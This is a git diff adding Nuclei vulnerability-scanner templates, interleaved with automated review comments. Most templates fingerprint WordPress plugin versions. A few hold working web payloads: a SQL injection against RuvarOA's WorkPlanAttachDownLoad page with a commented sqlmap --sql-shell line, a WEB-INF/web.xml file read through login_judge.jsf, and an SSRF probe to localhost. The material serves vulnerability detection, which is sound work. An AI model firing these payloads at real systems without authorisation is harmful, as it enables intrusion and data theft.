"{{BaseURL}}/wp-content/plugins/wp-custom-taxonomy-image/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-custom-taxonomy-image" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-9627-609d2082cbf88b0e9c345dfb753e9c47.yaml b/poc/cve/CVE-2024-9627-609d2082cbf88b0e9c345dfb753e9c47.yaml new file mode 100644 index 0000000000..5d961f0e32 --- /dev/null +++ b/poc/cve/CVE-2024-9627-609d2082cbf88b0e9c345dfb753e9c47.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-9627-609d2082cbf88b0e9c345dfb753e9c47 + +info: + name: > + TeploBot - Telegram Bot for WP <= 1.3 - Telegram Bot Token Disclosure + author: topscoder + severity: high + description: > + The TeploBot - Telegram Bot for WP plugin for WordPress is vulnerable to sensitive information disclosure due to missing authorization checks on the 'service_process' function in all versions up to, and including, 1.3. This makes it possible for unauthenticated attackers to view the Telegram Bot Token, which is a secret token to control the bot. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/091dadcb-71ac-4321-b3aa-72b5fbbd9163?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L + cvss-score: 8.6 + cve-id: CVE-2024-9627 + metadata: + fofa-query: "wp-content/plugins/green-wp-telegram-bot-by-teplitsa/" + google-query: inurl:"/wp-content/plugins/green-wp-telegram-bot-by-teplitsa/" + shodan-query: 'vuln:CVE-2024-9627' + tags: cve,wordpress,wp-plugin,green-wp-telegram-bot-by-teplitsa,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/green-wp-telegram-bot-by-teplitsa/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "green-wp-telegram-bot-by-teplitsa" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/injection/injection.yaml b/poc/injection/injection.yaml new file mode 100644 index 0000000000..0dabf5d877 --- /dev/null +++ b/poc/injection/injection.yaml 
@@ -0,0 +1,20 @@
+id: injection
+info:
+ name: Injection (SQL Injection)
+ author: Ali Baykara
+ severity: high
+ description: |
+ Detects potential SQL injection vulnerabilities by injecting a faulty SQL query into the URL.
+ tags: owasp, injection, sqli
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/search?query=test'"
+ matchers:
+ - type: word
+ words:
+ - "syntax error"
+ - type: status
+ status:
+ - 500
diff --git a/poc/other/Server-Side-Request-Forgery.yaml b/poc/other/Server-Side-Request-Forgery.yaml
new file mode 100644
index 0000000000..9f79a849a5
--- /dev/null
+++ b/poc/other/Server-Side-Request-Forgery.yaml
@@ -0,0 +1,18 @@
+id: ssrf
+info:
+ name: Server-Side Request Forgery (SSRF)
+ author: Ali Baykara
+ severity: critical
+ description: |
+ Attempts to exploit SSRF by sending a request to localhost.
+ tags: owasp, ssrf
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/api/v1/fetch"
+ body: '{"url":"http://127.0.0.1:80"}'
+ matchers:
+ - type: status
+ status:
+ - 200
diff --git a/poc/other/TVE-2024-105272140.yaml b/poc/other/TVE-2024-105272140.yaml
new file mode 100644
index 0000000000..be4c10dfd3
--- /dev/null
+++ b/poc/other/TVE-2024-105272140.yaml
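Review bot: The two entries under `matchers:` have no `matchers-condition`, so nuclei's default OR applies and every HTTP 500 from `/search?query=test'` is reported as high-severity SQL injection whatever the body says; add `matchers-condition: and` above `- type: word` so both the error text and the status are required. `"syntax error"` is also a plain substring match and `/search?query=` is a guessed path most applications do not expose, so even with AND this is a weak heuristic rather than a detection, and the description should say so. The same missing `matchers-condition` (default OR) affects `cryptographic-failures.yaml` and `broken-access-control.yaml` in this commit. `requests:` is the older spelling of the request block; the other templates in this commit use `http:`, which current nuclei expects.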
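Review bot: The only matcher is `status: 200`, so any endpoint that answers `POST /api/v1/fetch` with 200 — including a catch-all handler or an API that rejects the body inside a 200 JSON error — is reported as critical SSRF, yet a status code cannot show that the server fetched `http://127.0.0.1:80` at all. The match needs evidence from the response body tied to what the fetch would return, and the severity should reflect that the check is unconfirmed. The JSON body is sent with no `headers:` block, so there is no `Content-Type: application/json` and many frameworks will not parse it; add `headers:` with `Content-Type: application/json` under `body:`.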
@@ -0,0 +1,42 @@ +id: 2024-105272120 + +info: + name: RuvarOA协同办公平台 WorkPlanAttachDownLoad SQL注入漏洞 + author: k3ppf0r + severity: high + description: | + RuvarOA协同办公平台 WorkPlanAttachDownLoad SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + reference: + - https://blog.csdn.net/qq_41904294/article/details/138723401 + remediation: | + 升级RuvarOA到高版本 + classification: + cve-id: 2024-105272120 + cvss-score: 7.8 + cwe-id: CWE-89 + metadata: + date: 2024-05-11 + version: RuvarOA V6.01 、RuvarOA V12.01 + fofa-query: body="txt_admin_key" + tags: sqli,RuvarOA,leak + +# python sqlmap.py -u "http://xxxx?id=1*" --sql-shell + + +http: + - raw: + - | + @timeout: 10s + GET /WorkPlan/WorkPlanAttachDownLoad.aspx?sys_file_storage_id=1%27%20and%20%28@@version%29%3E0%29-- HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33 + Connection: close + + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + condition: and + diff --git a/poc/other/XVE-2024-2116.yaml b/poc/other/XVE-2024-2116.yaml new file mode 100644 index 0000000000..b4909b2672 --- /dev/null +++ b/poc/other/XVE-2024-2116.yaml 
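Review bot: `id: 2024-105272120` and `cve-id: 2024-105272120` disagree with the filename `TVE-2024-105272140.yaml` (…120 versus …140), and the value is not a CVE identifier, so `cve-id` should be left out and the vendor-style id kept only in `id:`/`metadata:`. The single DSL matcher `'status_code == 200'` (with `condition: and` over one expression) reports high-severity SQL injection for any server that answers the download URL with 200, which the normal handler may do for an invalid id; the matcher needs a body condition that only holds when the injected expression was actually evaluated. The commented-out tooling line between `tags:` and `http:` is not template content and should be dropped. The blank `reference:`-style gaps are absent here, but `metadata.version` mixes two product versions in one free-text value; a list would be easier to filter on.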
@@ -0,0 +1,40 @@
+id: local-file-include
+
+info:
+ name: local-file-include
+ author: k3ppf0r
+ severity: high
+ description: |
+ 该产品存在任意文件读取漏洞,未经身份验证攻击者可以利用漏洞读取服务器上的任意文件,包括配置文件等敏感信息。
+ reference:
+ -
+ remediation: |
+ 打对应补丁,重启服务
+ classification:
+ cve-id:
+ cvss-score: 7.5
+ cwe-id: CWE-552
+ metadata:
+ date:
+ version:
+ fofa-query:
+ tags: lfi,leak,path
+
+
+http:
+ - raw:
+ - |
+ GET /selfservice/selfservice/module/scgroup/web/login_judge.jsf?view=./WEB-INF/web.xml%3F HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ Accept-Encoding: gzip, deflate, br
+ Accept-Language: zh-CN,zh;q=0.9
+ Connection: close
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body,"xml version")'
+ - status_code == 200
+ condition: and
\ No newline at end of file
diff --git a/poc/other/anchor-episodes-index-58af0f18a5fcf1eb346c47b2a07233bf.yaml b/poc/other/anchor-episodes-index-58af0f18a5fcf1eb346c47b2a07233bf.yaml
new file mode 100644
index 0000000000..ac00356aef
--- /dev/null
+++ b/poc/other/anchor-episodes-index-58af0f18a5fcf1eb346c47b2a07233bf.yaml
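Review bot: `id: local-file-include` and `name: local-file-include` are generic — the id will collide with any other template that picks the same slug, and neither field names the product, even though the description says "该产品" (this product) and the request path `/selfservice/selfservice/module/scgroup/web/login_judge.jsf` is product-specific; the filename `XVE-2024-2116.yaml` suggests `id: xve-2024-2116` with the product named in `name:`. `reference:` holds a single empty list item (`-`), and `cve-id`, `date`, `version` and `fofa-query` are present but blank, which template validation may warn about; drop the empty keys rather than shipping them. The matcher pairing `contains(body,"xml version")` with `status_code == 200` under `condition: and` is a sensible minimum, unlike the status-only checks elsewhere in this commit.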
@@ -0,0 +1,59 @@ +id: anchor-episodes-index-58af0f18a5fcf1eb346c47b2a07233bf + +info: + name: > + Anchor Episodes Index (Spotify for Podcasters) <= 2.1.10 - Authenticated (Contributor+) Stored Cross-Site Scripting via anchor_episodes Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8c8e37f8-708e-41d5-a6b8-3ba587437532?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/anchor-episodes-index/" + google-query: inurl:"/wp-content/plugins/anchor-episodes-index/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,anchor-episodes-index,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/anchor-episodes-index/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "anchor-episodes-index" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.10') \ No newline at end of file diff --git a/poc/other/broken-access-control.yaml b/poc/other/broken-access-control.yaml new file mode 100644 index 0000000000..90095c158d --- /dev/null +++ b/poc/other/broken-access-control.yaml @@ -0,0 +1,20 @@ +id: broken-access-control +info: + name: Broken Access Control + author: Ali Baykara + severity: critical + description: | + Checks for the presence of broken access control vulnerabilities by attempting unauthorized access to admin areas. + tags: owasp, access-control + +requests: + - method: GET + path: + - "{{BaseURL}}/admin" + matchers: + - type: status + status: + - 200 + - type: word + words: + - "admin panel" 
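Review bot: `description: >` is empty and `cvss-metrics`, `cvss-score` and `cve-id` are blank while `tags:` still begins with `cve` and `shodan-query: 'vuln:'` is an empty query, so the template advertises a CVE it does not have and `-tags cve` runs will include it; drop `cve` from the tags, remove the empty classification keys and the `shodan-query`, and put the Wordfence title into `description:` until an identifier exists. The same blanks appear in `news-kit-elementor-addons-ba632fe2…`, `rover-idx-1f34dcc2…` and `rover-idx-62be7d19…` in this commit. `news-kit-elementor-addons-ba632fe2…` also carries the same Wordfence id (`ffc5408c-…`) and range (`<= 1.2.1`) as `CVE-2024-9541-720c3bbe….yaml` added earlier in the commit, so it is a duplicate that will double-report every affected host.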
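Review bot: Even with `matchers-condition: and` added (the default OR here makes any 200 on `/admin` a critical finding), a 200 whose body contains `"admin panel"` is exactly what an unauthenticated login page for an admin panel returns, so the check does not establish that protected content was reached. The word list needs a string that only appears after authorization (or the template should assert the absence of a login form), and `severity: critical` should be lowered until the match carries that evidence. A comment under `description:` such as `# heuristic: a 200 on /admin may be the login page, confirm manually` would keep the finding from being triaged as a confirmed access-control break.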
diff --git a/poc/other/cryptographic-failures.yaml b/poc/other/cryptographic-failures.yaml
new file mode 100644
index 0000000000..4ad2d4a659
--- /dev/null
+++ b/poc/other/cryptographic-failures.yaml
@@ -0,0 +1,20 @@
+id: cryptographic-failures
+info:
+ name: Cryptographic Failures
+ author: Ali Baykara
+ severity: high
+ description: |
+ Detects potential cryptographic failures by checking for exposed sensitive files like .git/config.
+ tags: owasp, cryptography
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/.git/config"
+ matchers:
+ - type: word
+ words:
+ - "[core]"
+ - type: status
+ status:
+ - 200
diff --git a/poc/other/insecure-design.yaml b/poc/other/insecure-design.yaml
new file mode 100644
index 0000000000..7215c36860
--- /dev/null
+++ b/poc/other/insecure-design.yaml
@@ -0,0 +1,17 @@
+id: insecure-design
+info:
+ name: Insecure Design (Sensitive Data Exposure)
+ author: Ali Baykara
+ severity: high
+ description: |
+ Checks for the exposure of sensitive data such as SSNs or other personally identifiable information (PII).
+ tags: owasp, insecure-design, sensitive-data
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/sensitive-data"
+ matchers:
+ - type: word
+ words:
+ - "SSN"
diff --git a/poc/other/logging-monitoring-failures.yaml b/poc/other/logging-monitoring-failures.yaml
new file mode 100644
index 0000000000..9bde19240d
--- /dev/null
+++ b/poc/other/logging-monitoring-failures.yaml
@@ -0,0 +1,17 @@
+id: logging-monitoring-failures
+info:
+ name: Security Logging and Monitoring Failures
+ author: Ali Baykara
+ severity: medium
+ description: |
+ Checks for the presence of logging and monitoring misconfigurations.
+ tags: owasp, logging, monitoring
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/logs"
+ matchers:
+ - type: word
+ words:
+ - "log"
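Review bot: `- "log"` under `words:` is a substring match, so `/logs` is flagged whenever the response contains "login", "blog", "catalog" or any asset name with "log" in it — which covers most login and not-found pages — and there is no status matcher to exclude a 404 body. The word needs to be something only a real log listing contains, or the matcher should pair a `status` check with a `regex` for a log-line format, and the description should not claim it detects "monitoring misconfigurations" when it only probes one path. `/logs`, like `/sensitive-data` in `insecure-design.yaml` and `/integrity-check` in `software-integrity-failures.yaml`, is a guessed endpoint, so these templates can only fire on applications that happen to use those names; a comment under `path:` such as `# placeholder path - tailor to the target application` would keep a medium/high finding from being read as a verified check. `cryptographic-failures.yaml` is really a `.git/config` exposure check and should be named and tagged as such, since git metadata exposure is not a cryptographic failure.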
diff --git a/poc/other/news-kit-elementor-addons-ba632fe2b740c260e31470629e4bce9b.yaml b/poc/other/news-kit-elementor-addons-ba632fe2b740c260e31470629e4bce9b.yaml new file mode 100644 index 0000000000..5018cbfc0f --- /dev/null +++ b/poc/other/news-kit-elementor-addons-ba632fe2b740c260e31470629e4bce9b.yaml @@ -0,0 +1,59 @@ +id: news-kit-elementor-addons-ba632fe2b740c260e31470629e4bce9b + +info: + name: > + News Kit Elementor Addons <= 1.2.1 - Authenticated (Contributor+) Sensitive Information Exposure via Canvas Menu Elementor Template + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ffc5408c-ca31-4cb6-8cb5-063acbbad01e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/news-kit-elementor-addons/" + google-query: inurl:"/wp-content/plugins/news-kit-elementor-addons/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,news-kit-elementor-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/news-kit-elementor-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "news-kit-elementor-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/other/rover-idx-1f34dcc286ffc93fb3e1b0d211037251.yaml b/poc/other/rover-idx-1f34dcc286ffc93fb3e1b0d211037251.yaml new file mode 100644 index 0000000000..67651fb744 --- /dev/null +++ b/poc/other/rover-idx-1f34dcc286ffc93fb3e1b0d211037251.yaml 
@@ -0,0 +1,59 @@
+id: rover-idx-1f34dcc286ffc93fb3e1b0d211037251
+
+info:
+ name: >
+ Rover IDX <= 3.0.0.2903 - Authenticated (Subscriber+) Missing Authorization via Multiple Functions
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/cdf67099-5514-45ba-9a4c-10af984bf593?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/rover-idx/"
+ google-query: inurl:"/wp-content/plugins/rover-idx/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,rover-idx,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/rover-idx/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "rover-idx"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.0.0.2903')
\ No newline at end of file
diff --git a/poc/other/rover-idx-62be7d19aacd1dc53511b643f4c494f8.yaml b/poc/other/rover-idx-62be7d19aacd1dc53511b643f4c494f8.yaml
new file mode 100644
index 0000000000..ca739cbda7
--- /dev/null
+++ b/poc/other/rover-idx-62be7d19aacd1dc53511b643f4c494f8.yaml
@@ -0,0 +1,59 @@
+id: rover-idx-62be7d19aacd1dc53511b643f4c494f8
+
+info:
+ name: >
+ Rover IDX <= 3.0.0.2905 - Authenticated (Subscriber+) Authentication Bypass to Administrator
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5cf6a9fb-3c3b-48ad-a39b-77a529b89901?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/rover-idx/"
+ google-query: inurl:"/wp-content/plugins/rover-idx/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,rover-idx,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/rover-idx/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "rover-idx"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.0.0.2905')
\ No newline at end of file
diff --git a/poc/other/software-integrity-failures.yaml b/poc/other/software-integrity-failures.yaml
new file mode 100644
index 0000000000..df934f8617
--- /dev/null
+++ b/poc/other/software-integrity-failures.yaml
@@ -0,0 +1,17 @@
+id: software-integrity-failures
+info:
+ name: Software and Data Integrity Failures
+ author: Ali Baykara
+ severity: high
+ description: |
+ Detects potential software integrity issues such as checksum mismatches or file tampering.
+ tags: owasp, integrity-failure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/integrity-check"
+ matchers:
+ - type: word
+ words:
+ - "checksum mismatch"
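Review bot: `severity: low` in rover-idx-62be7d19aacd1dc53511b643f4c494f8.yaml contradicts its own `name`, which describes an Authenticated (Subscriber+) Authentication Bypass to Administrator; an escalation from the lowest role to the highest is not a low-severity finding, and the `low` suffix in `tags:` repeats the mismatch. The sibling rover-idx-1f34dcc286ffc93fb3e1b0d211037251.yaml (Missing Authorization via Multiple Functions) is also `low`; both should take `severity` and `cvss-score` from the referenced Wordfence advisory rather than a default. With `description: >` empty there is nothing for a triager to judge a hit against, so at minimum the advisory title should be repeated there.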
diff --git a/poc/sql/CVE-2024-9231-db808094493fa9c79c27a8695747553b.yaml b/poc/sql/CVE-2024-9231-db808094493fa9c79c27a8695747553b.yaml
new file mode 100644
index 0000000000..d6d9e2d977
--- /dev/null
+++ b/poc/sql/CVE-2024-9231-db808094493fa9c79c27a8695747553b.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9231-db808094493fa9c79c27a8695747553b
+
+info:
+ name: >
+ WP-Members Membership Plugin <= 3.4.9.5 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The WP-Members Membership Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.4.9.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2d59e599-59da-4c03-b71f-d00a078b2442?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-9231
+ metadata:
+ fofa-query: "wp-content/plugins/wp-members/"
+ google-query: inurl:"/wp-content/plugins/wp-members/"
+ shodan-query: 'vuln:CVE-2024-9231'
+ tags: cve,wordpress,wp-plugin,wp-members,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-members/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-members"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.4.9.5')
\ No newline at end of file
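Review bot: CVE-2024-9231-db808094493fa9c79c27a8695747553b.yaml describes a Reflected Cross-Site Scripting issue and carries no SQL-related tag, yet it is filed under poc/sql; it belongs under poc/xss or poc/wordpress. This commit also adds poc/wordpress/wp-members-d9bd5a558214a2feec4d73014329df0f.yaml, which references the same Wordfence advisory id 2d59e599-59da-4c03-b71f-d00a078b2442 and the same `<= 3.4.9.5` bound but leaves `cve-id`, `cvss-metrics`, `cvss-score` and `description` empty — a weaker duplicate of this file that should be dropped or merged into it. The `description` states the plugin is vulnerable, but the matchers only fingerprint the `Stable tag` in `readme.txt`; a sentence such as `Version fingerprint only: reports installations at or below 3.4.9.5, does not confirm the reflection.` would keep triage honest.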
diff --git a/poc/sql/green-wp-telegram-bot-by-teplitsa-f4d91a36f69a0a6db9e8b66dd5fbf50c.yaml b/poc/sql/green-wp-telegram-bot-by-teplitsa-f4d91a36f69a0a6db9e8b66dd5fbf50c.yaml
new file mode 100644
index 0000000000..c9637d5d13
--- /dev/null
+++ b/poc/sql/green-wp-telegram-bot-by-teplitsa-f4d91a36f69a0a6db9e8b66dd5fbf50c.yaml
@@ -0,0 +1,59 @@
+id: green-wp-telegram-bot-by-teplitsa-f4d91a36f69a0a6db9e8b66dd5fbf50c
+
+info:
+ name: >
+ TeploBot - Telegram Bot for WP <= 1.3 - Telegram Bot Token Disclosure
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/091dadcb-71ac-4321-b3aa-72b5fbbd9163?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/green-wp-telegram-bot-by-teplitsa/"
+ google-query: inurl:"/wp-content/plugins/green-wp-telegram-bot-by-teplitsa/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,green-wp-telegram-bot-by-teplitsa,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/green-wp-telegram-bot-by-teplitsa/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "green-wp-telegram-bot-by-teplitsa"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3')
\ No newline at end of file
diff --git a/poc/sql/wp-custom-taxonomy-meta-03d615dbe0d467782bc97145da21db4c.yaml b/poc/sql/wp-custom-taxonomy-meta-03d615dbe0d467782bc97145da21db4c.yaml
new file mode 100644
index 0000000000..42815ac58a
--- /dev/null
+++ b/poc/sql/wp-custom-taxonomy-meta-03d615dbe0d467782bc97145da21db4c.yaml
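Review bot: poc/sql/green-wp-telegram-bot-by-teplitsa-f4d91a36f69a0a6db9e8b66dd5fbf50c.yaml is byte-identical to poc/wordpress/green-wp-telegram-bot-by-teplitsa-f4d91a36f69a0a6db9e8b66dd5fbf50c.yaml added later in this commit (both `index 0000000000..c9637d5d13`), and poc/sql/wp-custom-taxonomy-meta-03d615dbe0d467782bc97145da21db4c.yaml duplicates its poc/wordpress twin the same way (both `42815ac58a`). Neither template is a SQL-injection check — one is a Telegram bot token disclosure, the other a CSRF — so the poc/sql copies look like a misfiled batch; keeping only the poc/wordpress copies also avoids two templates sharing one `id`, which a loader that indexes templates by `id` will presumably report as a collision. If both locations are intended, the copies need distinct `id` values.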
@@ -0,0 +1,59 @@
+id: wp-custom-taxonomy-meta-03d615dbe0d467782bc97145da21db4c
+
+info:
+ name: >
+ Category and Taxonomy Meta Fields <= 1.0.0 - Cross-Site Request Forgery to Taxonomy Meta Add/Delete
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2dc9c744-6ffb-4d7a-94ce-ba576d7b6d47?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-custom-taxonomy-meta/"
+ google-query: inurl:"/wp-content/plugins/wp-custom-taxonomy-meta/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-custom-taxonomy-meta,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-custom-taxonomy-meta/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-custom-taxonomy-meta"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.0')
\ No newline at end of file
diff --git a/poc/wordpress/all-in-one-wp-migration-d0602d88b7a2ebc8e02fc980ec9ff551.yaml b/poc/wordpress/all-in-one-wp-migration-d0602d88b7a2ebc8e02fc980ec9ff551.yaml
new file mode 100644
index 0000000000..6adb054675
--- /dev/null
+++ b/poc/wordpress/all-in-one-wp-migration-d0602d88b7a2ebc8e02fc980ec9ff551.yaml
@@ -0,0 +1,59 @@
+id: all-in-one-wp-migration-d0602d88b7a2ebc8e02fc980ec9ff551
+
+info:
+ name: >
+ All-in-One WP Migration and Backup <= 7.86 - Unauthenticated Information Disclosure via Error Logs
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c4901d9d-7b37-40d5-a42b-59c80bbbe8ff?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/all-in-one-wp-migration/"
+ google-query: inurl:"/wp-content/plugins/all-in-one-wp-migration/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,all-in-one-wp-migration,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "all-in-one-wp-migration"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 7.86')
\ No newline at end of file
